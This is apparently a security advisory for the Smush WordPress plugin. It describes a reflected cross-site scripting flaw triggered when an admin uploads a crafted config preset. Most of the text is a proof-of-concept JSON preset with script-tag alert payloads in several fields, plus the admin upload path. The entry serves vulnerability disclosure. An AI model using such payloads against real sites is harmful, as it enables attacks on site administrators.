The plugin does not sanitise and escape a configuration parameter before outputting it back in an admin page when uploading a malicious preset configuration, leading to a Reflected Cross-Site Scripting. For the attack to be successful, an attacker would need an admin to upload a malicious configuration file
Upload the following config preset via Smush > Settings > Configs (/wp-admin/admin.php?page=smush-settings&view=configs) { "id": 1645860821240, "name": " <script /**/>/**/alert(1)/**/</script /**/", "description": "\n<script /**/>/**/alert(1)/**/</script /**/\n", "config": { "configs": { "settings": { "auto": true, "lossy": false, "strip_exif": true, "resize": false, "detection": false, "original": false, "backup": false, "no_scale": false, "png_to_jpg": false, "nextgen": false, "s3": false, "gutenberg": false, "js_builder": false, "cdn": false, "usage": false, "accessible_colors": false, "keep_data": true, "lazy_load": false, "webp_mod": false } }, "strings": { "bulk_smush": [ "Automatic compression - Active\nSuper-Smush - Inactive\nMetadata - Active\nImage Resizing - Inactive\nUploaded Images - Inactive\nBackup Uploaded Images - Inactive\nPNG to JPEG Conversion - Inactive\nDisable Scaled Images - Inactive" ], "lazy_load": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "cdn": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "webp_mod": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "integrations": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "tools": [ "Image Resize Detection - Inactive" ], "settings": [ "Color Accessibility - Inactive\nUsage Tracking - Inactive\nKeep Data On Uninstall - Active" ] } }, "plugin": "912164" }
Taurus Omar
Taurus Omar
Yes
2022-05-03 (about 9 months ago)
2022-05-03 (about 9 months ago)
2022-05-04 (about 9 months ago)